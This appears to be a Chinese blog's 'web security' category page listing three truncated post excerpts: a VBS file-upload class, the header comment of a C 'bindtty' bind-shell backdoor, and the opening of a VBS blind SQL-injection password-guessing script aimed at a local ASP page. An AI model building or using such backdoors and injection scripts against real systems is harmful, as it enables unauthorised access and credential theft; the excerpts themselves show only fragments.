文章分类 - web安全
web安全,web脚本相关
VBS模拟POST上传文件的代码
摘要:''XML Upload Class Class XMLUpload Private xmlHttp Private objTemp Private adTypeBinary, adTypeText Private strCharset, strBoundary Private Sub Class_Initialize() adTypeBinary = 1 adTypeText = 2 Set xmlHttp = CreateObject("Msxml2.XMLHTTP") Set objTemp = CreateObject("ADODB.Str
阅读全文
posted @ 2014-04-10 15:47
举剑问天
linux shell支持pty tty
摘要:不多说,上代码,用putty的Rlogin直接连接就行了 1 /* 2 bindtty - like bindshell, but with tty 3 Features: 4 - it can handle any number of clients 5 - allocates tty for each session 6 - no using termios.h/tty.h: compiles on most of gccs 7 - linux specific ;( 8 9 by ...
阅读全文
posted @ 2014-02-28 03:04
举剑问天
VBS实现注入
摘要:1 RightW = "OK!" '定义正确页面返回的关键字. 2 tablename = "useradmin" '定义表名,列名,本程序不提供表名,列名猜测功能,仅仅提供密码猜测. 3 filedname = "password" 4 WScript.Echo "Start check the tname and the fname,please waiting... ..." 5 6 URL="http://127.0.0.1/fwork/f.asp?username=admin&a
阅读全文
posted @ 2014-02-22 07:03
举剑问天
浙公网安备 33010602011771号